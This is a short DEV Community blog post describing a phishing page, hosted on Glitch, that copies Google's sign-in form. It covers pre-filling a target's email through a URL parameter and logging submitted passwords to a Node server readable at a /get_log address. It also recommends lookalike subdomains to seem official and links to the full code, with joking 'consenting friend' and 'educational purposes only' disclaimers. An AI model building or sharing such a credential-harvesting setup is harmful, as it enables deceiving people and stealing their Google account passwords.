DEV Community

Clark Weckmann
Clark Weckmann

Posted on • Originally published at weckmann.me on

Steal Your Consenting Friend's Gmail Password

Do you have a consenting friend who you just happen to need their password? Look no more, here is a complete set up.

How did I do it?

If you just want the code hop over to Glitch. Please note this code is for educational purposes only.

I started off with building the form. The form is designed to look identical to a google login form.

Set the query parameter email equal to a users email. For example:

google-phishing.glitch.me/?email=admin1@gmail.com

Some Javascript handles the post request to the Node server.

Navigate to https://google-phishing.glitch.me/get_log to see the collected passwords.

Why do people fall for this? Most of us see the Google logo and feel safe. A domain like accounts-google-sign-in-appspot-com.glitch.me/… at a glace looks official. Naturally, we want to login to access our data.

Whatever you do with this, I hold no liability.


Reply via email

Top comments (0)